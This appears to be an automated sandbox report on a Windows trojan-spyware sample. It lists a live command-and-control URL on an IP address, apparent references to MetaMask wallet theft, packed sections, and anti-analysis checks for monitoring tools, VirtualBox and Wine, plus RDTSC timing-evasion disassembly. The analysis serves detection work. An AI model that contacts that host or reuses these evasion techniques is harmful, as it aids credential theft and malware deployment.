Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2545709966.00000000013B3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2544618204.00000000008CA000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2545709966.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php&
Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php9
Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpU
Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ
Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.2545709966.00000000013E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpi
Source: file.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpinit.exe
Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpion:
Source: file.exe, 00000000.00000002.2545709966.00000000013B3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpo
Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpser
Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.1000d60be0de163924d/sqlite3.dllY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZG
Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100DBG
Source: file.exe, 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100Dm
Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100Local
Source: file.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100s.exe
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 1544

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: cwrvobrg ZLIB complexity 0.9947073079619244

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/6@0/1

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\H1QKHLSH.htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2800

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\1aba86ce-6dba-4936-a6d4-f5ef64b6e893

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

ReversingLabs: Detection: 36%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 1544

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1830912 > 1048576

Source: file.exe

Static PE information: Raw size of cwrvobrg is bigger than: 0x100000 < 0x1a7800

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.860000.0.unpack :EW;.rsrc :W;.idata :W; :EW;cwrvobrg:EW;olxkocyk:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;cwrvobrg:EW;olxkocyk:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: file.exe

Static PE information: real checksum: 0x1c8ac4 should be: 0x1bf150

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: cwrvobrg
Source: file.exe	Static PE information: section name: olxkocyk
Source: file.exe	Static PE information: section name: .taggant

Source: file.exe

Static PE information: section name: cwrvobrg entropy: 7.95287821777637

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C29852 second address: C29868 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C29868 second address: C29884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F18DC15D0h 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28B5D second address: C28B63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28B63 second address: C28B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28B69 second address: C28B85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F1851F5E7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28B85 second address: C28B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1F18DC15C6h 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C28CE0 second address: C28CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C290A1 second address: C290BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15D8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C290BD second address: C290EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E5h 0x00000007 jmp 00007F1F1851F5DEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C571 second address: C2C62B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F1F18DC15C8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 xor dword ptr [ebp+122D18F7h], ecx 0x0000002d jmp 00007F1F18DC15CAh 0x00000032 push 00000000h 0x00000034 jmp 00007F1F18DC15CFh 0x00000039 call 00007F1F18DC15C9h 0x0000003e push ecx 0x0000003f jnc 00007F1F18DC15DEh 0x00000045 pop ecx 0x00000046 push eax 0x00000047 pushad 0x00000048 jmp 00007F1F18DC15D4h 0x0000004d jc 00007F1F18DC15C8h 0x00000053 pushad 0x00000054 popad 0x00000055 popad 0x00000056 mov eax, dword ptr [esp+04h] 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d jp 00007F1F18DC15C6h 0x00000063 pop ebx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C62B second address: C2C65E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c jmp 00007F1F1851F5DFh 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1F1851F5DAh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C65E second address: C2C6BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b push 00000003h 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F1F18DC15C8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 sub ecx, 74B0F2ACh 0x0000002f push 00000003h 0x00000031 add ecx, dword ptr [ebp+122D3689h] 0x00000037 call 00007F1F18DC15C9h 0x0000003c push ecx 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C6BA second address: C2C6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C7DA second address: C2C7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C7DE second address: C2C87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1850h], esi 0x0000000e push 00000000h 0x00000010 jmp 00007F1F1851F5E1h 0x00000015 push 3AC3A203h 0x0000001a pushad 0x0000001b jmp 00007F1F1851F5DCh 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 jmp 00007F1F1851F5E3h 0x00000028 popad 0x00000029 popad 0x0000002a xor dword ptr [esp], 3AC3A283h 0x00000031 mov ecx, esi 0x00000033 push 00000003h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F1F1851F5D8h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f mov ecx, dword ptr [ebp+122D3911h] 0x00000055 push 00000000h 0x00000057 mov edi, dword ptr [ebp+122D3789h] 0x0000005d push 00000003h 0x0000005f mov di, dx 0x00000062 call 00007F1F1851F5D9h 0x00000067 pushad 0x00000068 jnc 00007F1F1851F5DCh 0x0000006e push edi 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C87F second address: C2C8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 jp 00007F1F18DC15E5h 0x0000000d pushad 0x0000000e jnc 00007F1F18DC15C6h 0x00000014 jmp 00007F1F18DC15D7h 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push edx 0x0000001f jmp 00007F1F18DC15D7h 0x00000024 pop edx 0x00000025 mov eax, dword ptr [eax] 0x00000027 jmp 00007F1F18DC15D4h 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F1F18DC15D9h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C8FF second address: C2C905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C905 second address: C2C90B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C90B second address: C2C90F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C90F second address: C2C94B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 cld 0x0000000a pushad 0x0000000b mov edx, 50169A55h 0x00000010 mov dword ptr [ebp+122D2E2Bh], ecx 0x00000016 popad 0x00000017 lea ebx, dword ptr [ebp+1245C451h] 0x0000001d push edx 0x0000001e mov ecx, dword ptr [ebp+122D37FDh] 0x00000024 pop ecx 0x00000025 xor cx, A680h 0x0000002a push eax 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F1F18DC15CEh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C94B second address: C2C94F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2C9BD second address: C2C9FF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1F18DC15D7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F1F18DC15CAh 0x00000013 jmp 00007F1F18DC15D8h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C2CAD8 second address: C2CADD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B676 second address: C4B68D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1F18DC15CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B68D second address: C4B691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B691 second address: C4B695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C4B695 second address: C4B69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
